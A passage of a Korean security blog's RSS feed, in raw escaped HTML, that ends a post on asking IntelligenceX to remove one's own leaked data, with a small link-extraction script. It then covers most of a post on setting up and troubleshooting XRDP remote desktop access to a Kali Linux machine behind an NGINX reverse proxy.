this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1159&quot; height=&quot;1005&quot; data-origin-width=&quot;1159&quot; data-origin-height=&quot;1005&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 서비스 내에서 확인된 데이터 이외 연계된 정보들도 확인해봐야한다. (ex- IP/SystemID 값 등) 본인의 경우 본 시스템 이름 및 IP 로 작성된 항목들도 존재하여 추가 확인을 수행하였다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1274&quot; data-origin-height=&quot;1005&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ny6s7/btsNRH6JjDJ/TrF2IYzzXLGXc6qim1xsA1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ny6s7/btsNRH6JjDJ/TrF2IYzzXLGXc6qim1xsA1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ny6s7/btsNRH6JjDJ/TrF2IYzzXLGXc6qim1xsA1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fny6s7%2FbtsNRH6JjDJ%2FTrF2IYzzXLGXc6qim1xsA1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1274&quot; height=&quot;1005&quot; data-origin-width=&quot;1274&quot; data-origin-height=&quot;1005&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 링크 정보로 노출되어있는 코드 값을 가져올 수 있는데, 본인의 경우, 해당 소스코드에서 '&amp;lt;pre&amp;gt;' 태그 내 정보를 모두 복사하여 따로 저장해두었다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이후 파이썬 코드를 이용하여 본 링크를 모두 가져올 수 있다.&lt;/p&gt;
&lt;pre id=&quot;code_1746933206937&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;from bs4 import BeautifulSoup
import re

with open('[저장한 파일 명]', 'r', encoding='utf-8') as file:
    content = file.read()

soup = BeautifulSoup(content, 'html.parser')
 &amp;gt;
links = soup.find_all('a')
did_values = []

for link in links:
    href = link.get('href')
    if href and '?did=' in href:
        did_value = href.split('?did=')[1]
        did_values.append(did_value)

for did in did_values:
    print(did)&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/D8LjF/btsNRcTo34m/qDWYsKcgOsSorTigHDpSbK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/D8LjF/btsNRcTo34m/qDWYsKcgOsSorTigHDpSbK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/D8LjF/btsNRcTo34m/qDWYsKcgOsSorTigHDpSbK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FD8LjF%2FbtsNRcTo34m%2FqDWYsKcgOsSorTigHDpSbK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이와 같이 모든 코드를 중복없이 취합하여 IntelligenceX 측에 해당 데이터 삭제요청을 보내보자.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1274&quot; data-origin-height=&quot;1005&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/zbP49/btsNRfJmNR7/3jJ6lFPkyHF6gKxzmf3bw0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/zbP49/btsNRfJmNR7/3jJ6lFPkyHF6gKxzmf3bw0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/zbP49/btsNRfJmNR7/3jJ6lFPkyHF6gKxzmf3bw0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FzbP49%2FbtsNRfJmNR7%2F3jJ6lFPkyHF6gKxzmf3bw0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1274&quot; height=&quot;1005&quot; data-origin-width=&quot;1274&quot; data-origin-height=&quot;1005&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1274&quot; data-origin-height=&quot;1005&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b3tmcL/btsNSbfBz8D/e2CvygQL1jjk7rheIpji70/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b3tmcL/btsNSbfBz8D/e2CvygQL1jjk7rheIpji70/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b3tmcL/btsNSbfBz8D/e2CvygQL1jjk7rheIpji70/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb3tmcL%2FbtsNSbfBz8D%2Fe2CvygQL1jjk7rheIpji70%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1274&quot; height=&quot;1005&quot; data-origin-width=&quot;1274&quot; data-origin-height=&quot;1005&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 메일을 보내면 며칠 뒤 다음과 같은 메일을 받아볼 수 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1645&quot; data-origin-height=&quot;803&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bL99He/btsNSKuKosW/9kQAey4Wq9XYwqtVGQ5PQ1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bL99He/btsNSKuKosW/9kQAey4Wq9XYwqtVGQ5PQ1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bL99He/btsNSKuKosW/9kQAey4Wq9XYwqtVGQ5PQ1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbL99He%2FbtsNSKuKosW%2F9kQAey4Wq9XYwqtVGQ5PQ1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1645&quot; height=&quot;803&quot; data-origin-width=&quot;1645&quot; data-origin-height=&quot;803&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>Attack Code/OSINT</category>
      <category>intelligencex</category>
      <category>데이터 노출 확인</category>
      <category>딥웹 노출</category>
      <category>딥웹 데이터 노출</category>
      <category>인텔리전스x</category>
      <category>해킹 사고</category>
      <category>해킹 사고 데이터 요청</category>
      <author>Kai_HT</author>
      <guid isPermaLink="true">https://kaisec.tistory.com/77</guid>
      <comments>https://kaisec.tistory.com/entry/Intelligence-X-Extraction-of-My-Code#entry77comment</comments>
      <pubDate>Sun, 11 May 2025 12:57:55 +0900</pubDate>
    </item>
    <item>
      <title>RDP GUI Connection</title>
      <link>https://kaisec.tistory.com/entry/RDP-GUI-Connection</link>
      <description>&lt;h1&gt;[Linux] RDP GUI Connection&lt;/h1&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1120&quot; data-origin-height=&quot;840&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dbj4Cd/btsNOgsTgOZ/ykkXkKoyk4ZXf7KB5MvqO0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dbj4Cd/btsNOgsTgOZ/ykkXkKoyk4ZXf7KB5MvqO0/img.png&quot; data-alt=&quot;https://static1.makeuseofimages.com/wordpress/wp-content/uploads/2021/07/install-kali-linux-in-vmware.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dbj4Cd/btsNOgsTgOZ/ykkXkKoyk4ZXf7KB5MvqO0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fdbj4Cd%2FbtsNOgsTgOZ%2FykkXkKoyk4ZXf7KB5MvqO0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1120&quot; height=&quot;840&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1120&quot; data-origin-height=&quot;840&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://static1.makeuseofimages.com/wordpress/wp-content/uploads/2021/07/install-kali-linux-in-vmware.jpg&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;본인은 칼리 리눅스를 임의 노트북 내 설치하여 원격으로 연결하여 사용한다. 아직 직접적으로 진단 수행 시 사용해본 적이 없으나, 환경을 구축하여 이후에 사용할 일이 있는 경우 굉장히 유용하게 사용하면 좋을 것 같다는 판단이 들어 설정해두었다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;720&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ly8fq/btsNOlOujRE/SlvgQozEJlKzDrFTg7VTi0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ly8fq/btsNOlOujRE/SlvgQozEJlKzDrFTg7VTi0/img.png&quot; data-alt=&quot;Kali linux 접근 구성도&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ly8fq/btsNOlOujRE/SlvgQozEJlKzDrFTg7VTi0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fly8fq%2FbtsNOlOujRE%2FSlvgQozEJlKzDrFTg7VTi0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1280&quot; height=&quot;720&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;720&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Kali linux 접근 구성도&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;본인의 개인 네트워크를 구성해두어서 보다 간편하게 구상도가 그려질 수 있었다. 현재 Kali HOST 의 경우 직접 접근이 불가하고 본인의 다른 서버 접근 후 커넥션해야 접근이 가능하다. 때문에 본 서버에 대한 서브 도메인을 설정하여 접근하도록 네트워크를 등록했다. (리버스 프록시 서버 설정)&lt;/p&gt;
&lt;hr data-ke-style=&quot;style1&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;각설하고 Kali 리눅스의 특징은 여러 툴을 가지고 있다는 것인데, 해당 툴들의 대부분은 CLI 환경이 아닌 GUI 환경에서 사용하는 것이 편하거나 사용이 가능하다는 점이 있기에 &lt;code&gt;&lt;span style=&quot;background-color: #dddddd; color: #ee2323;&quot;&gt;&lt;b&gt;ssh&lt;/b&gt;&lt;/span&gt;&lt;/code&gt; 환경을 이용한 연결이 아니라 GUI 환경으로 연결하여 사용하는 방법을 찾아보았다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;서비스는 &lt;b&gt;R&lt;/b&gt;emote &lt;b&gt;D&lt;/b&gt;esktop &lt;b&gt;P&lt;/b&gt;rotocol (이하 RDP) 을 윈도우가 아닌 Linux 나 BSD 등에서 사용할 수 있는 XRDP 를 사용할 것이며, 해당 패키지의 설치가 요구된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;다른 GUI 연결 환경이나 패키지가 존재하나 RDP 가 확실히 연결성이 좋아서 해당 방법을 이용하여 연결하기로 하였다.&lt;/p&gt;
&lt;pre class=&quot;bash&quot; data-ke-language=&quot;bash&quot;&gt;&lt;code&gt;sudo apt-get install xrdp&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/d9veWR/btsNOheglbn/llDIFq1qRMjnP0q8uQyjCK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/d9veWR/btsNOheglbn/llDIFq1qRMjnP0q8uQyjCK/img.png&quot; data-alt=&quot;sudo apt-get install xrdp&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/d9veWR/btsNOheglbn/llDIFq1qRMjnP0q8uQyjCK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fd9veWR%2FbtsNOheglbn%2FllDIFq1qRMjnP0q8uQyjCK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;sudo apt-get install xrdp&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 패키지 설치 이후 본 패키지의 설치가 정상적인지 확인해보자&lt;/p&gt;
&lt;pre class=&quot;ebnf&quot;&gt;&lt;code&gt;sudo systemctl status xrdp&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/S7R3D/btsNNP3DqqB/07SBTG5sWCe9upvHjXwBBK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/S7R3D/btsNNP3DqqB/07SBTG5sWCe9upvHjXwBBK/img.png&quot; data-alt=&quot;sudo systemctl status xrdp&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/S7R3D/btsNNP3DqqB/07SBTG5sWCe9upvHjXwBBK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FS7R3D%2FbtsNNP3DqqB%2F07SBTG5sWCe9upvHjXwBBK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;sudo systemctl status xrdp&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;본인의 경우 패키지가 정상 설치가 완료되었으나 active 되지 않는 것을 확인할 수 있다. 때문에 &lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;systemctl&lt;/code&gt;&lt;/b&gt;&lt;/span&gt; start 명령으로 해당 패키지를 실행하여 연결을 수행하였다.&lt;/p&gt;
&lt;pre class=&quot;crmsh&quot;&gt;&lt;code&gt;sudo systemctl start xrdp&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;여기에서 한 가지 변동 사항이 있는데, 본인의 경우 RDP 로 본인의 데스크탑 환경을 설정해두어 포트 변경이 필요하였다. 때문에 &lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;/etc/xrdp/xrdp.ini&lt;/code&gt;&lt;/b&gt;&lt;/span&gt; 파일에 대한 수정을 수행했다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/GHc3l/btsNOmfzhpz/oADXFiLsULPOFo9Dytk5eK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/GHc3l/btsNOmfzhpz/oADXFiLsULPOFo9Dytk5eK/img.png&quot; data-alt=&quot;sudo vi&amp;amp;nbsp; /etc/xrdp/xrdp.ini&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/GHc3l/btsNOmfzhpz/oADXFiLsULPOFo9Dytk5eK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FGHc3l%2FbtsNOmfzhpz%2FoADXFiLsULPOFo9Dytk5eK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;sudo vi&amp;nbsp; /etc/xrdp/xrdp.ini&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;xrdp 설정 이후 sesman 파일도 설정이 요구된다.&lt;/p&gt;
&lt;pre class=&quot;angelscript&quot;&gt;&lt;code&gt;[Global]
ListenAddress=~~127.0.0.1~~ 0.0.0.0&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;설정이 모두 완료되었다면 원격지에서 해당 서버로 연결을 수행한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;475&quot; data-origin-height=&quot;565&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b1Tfz7/btsNL0yK5st/nr7tlT5gle99d8rJUvB640/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b1Tfz7/btsNL0yK5st/nr7tlT5gle99d8rJUvB640/img.png&quot; data-alt=&quot;원격지 RDP 연결 시도&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b1Tfz7/btsNL0yK5st/nr7tlT5gle99d8rJUvB640/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb1Tfz7%2FbtsNL0yK5st%2Fnr7tlT5gle99d8rJUvB640%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;475&quot; height=&quot;565&quot; data-origin-width=&quot;475&quot; data-origin-height=&quot;565&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;원격지 RDP 연결 시도&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;참고로 해당 연결 전에 &lt;b&gt;꼭 포트포워딩 등의 네트워크 작업&lt;/b&gt;을 해주자. &lt;b&gt;당연히 하지 않으면 연결이 되지 않는다.&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;818&quot; data-origin-height=&quot;671&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/FzSlc/btsNOkB3j3V/p22w809UiRN6D06jXGFXwk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/FzSlc/btsNOkB3j3V/p22w809UiRN6D06jXGFXwk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/FzSlc/btsNOkB3j3V/p22w809UiRN6D06jXGFXwk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FFzSlc%2FbtsNOkB3j3V%2Fp22w809UiRN6D06jXGFXwk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;818&quot; height=&quot;671&quot; data-origin-width=&quot;818&quot; data-origin-height=&quot;671&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;또한 본인처럼 리버스 프록시를 사용하고 있는 중이라면 해당 리버스 프록시에서 &lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;stream&lt;/code&gt; &lt;/b&gt;&lt;/span&gt;등의 옵션으로 3350 설정이 요구된다.&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;NGINX 리버스 프록시 예시&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class=&quot;bash&quot; data-ke-language=&quot;bash&quot;&gt;&lt;code&gt;server {
    listen 3390; // Default Port is 3389
    proxy_pass [TargetIP]:3390;
}

server {
    listen 3350; // XRDP-Sesman Port
    proxy_pass [TargetIP]:3350;
}&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1920&quot; data-origin-height=&quot;1080&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c7JB1N/btsNNJ3CFn3/9XKpg90m3TGF5es0wWK5Uk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c7JB1N/btsNNJ3CFn3/9XKpg90m3TGF5es0wWK5Uk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c7JB1N/btsNNJ3CFn3/9XKpg90m3TGF5es0wWK5Uk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc7JB1N%2FbtsNNJ3CFn3%2F9XKpg90m3TGF5es0wWK5Uk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1920&quot; height=&quot;1080&quot; data-origin-width=&quot;1920&quot; data-origin-height=&quot;1080&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr data-ke-style=&quot;style1&quot; /&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;Error Confirm&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;만일 XRDP 설치 이후 정상적인 XRDP 가 수행되지 않는다면 클라이언트 단인 원격지에서 로그인 수행 시 확인되는 에러 창이나 서버 내에서 확인되는 에러를 확인해야한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;서버 내 에러 확인 코드:&lt;/p&gt;
&lt;pre class=&quot;ebnf&quot;&gt;&lt;code&gt;journalctl -u xrdp -f&lt;/code&gt;&lt;/pre&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;Server Error:&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Unable to locate executable '/usr/sbin/xrdp': No such file or directory&lt;br /&gt;Failed at step EXEC spawning /usr/sbin/xrdp: No such file or directory&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 에러의 경우 &lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;/usr/sbin/xrdp&lt;/code&gt;&lt;/b&gt;&lt;/span&gt; 위치가 잘못되었기 때문인데, 이때 xrdp 파일의 위치를 확인해야한다. 칼리의 경우 따로 커스텀화되어 저장되어있거나 설정되어있기 때문이다.&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;&lt;b&gt;실행 파일 경로 확인 및 수정&lt;/b&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;XRDP 바이너리 실제 위치 확인 후 시스템 서비스 파일 경로 조정:&lt;/p&gt;
&lt;pre class=&quot;1c&quot;&gt;&lt;code&gt;whereis xrdp | grep bin&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;작성된 경로 &lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;/usr/sbin/xrdp&lt;/code&gt;&lt;/b&gt;&lt;/span&gt; 가 아닌 다른 경로로 확인되었다면 XRDP 의 설정에 작성된 경로를 확인된 경로로 바꿔주거나, 해당 경로 내 링크를 만들어주면된다.&lt;/p&gt;
&lt;pre class=&quot;reasonml&quot;&gt;&lt;code&gt;sudo ln -s $(which xrdp) /usr/sbin/xrdp&lt;/code&gt;&lt;/pre&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;Client Error:&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Error connecting to sesman on sesman.socket&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;본인의 경우, XRDP 를 &lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;apt&lt;/code&gt; &lt;/b&gt;&lt;/span&gt;를 이용하여 설치하였다가 정상 연결이 되지 않아 &lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;&lt;code&gt;github&lt;/code&gt; &lt;/b&gt;&lt;/span&gt;를 이용하여 연결을 시도하였다.&lt;br /&gt;****- git 을 이용한 XRDP 설치&lt;/p&gt;
&lt;pre class=&quot;jboss-cli&quot;&gt;&lt;code&gt;git clone https://github.com/neutrinolabs/xrdp.git
cd xrdp
./bootstrap
./configure --prefix=/usr
make
sudo make install&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;때문에 해당 오류는 XRDP v0.10.x 이상에서 Unix 도메인 소켓 방식으로 도입되었음에도 반영되지 않아 확인된 에러다.&lt;/p&gt;
&lt;pre class=&quot;vim&quot;&gt;&lt;code&gt;xrdp --version | grep -i &quot;xrdp&quot;&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;본 에러에 대한 해결 방법의 단계는 다음과 같다.&lt;/p&gt;
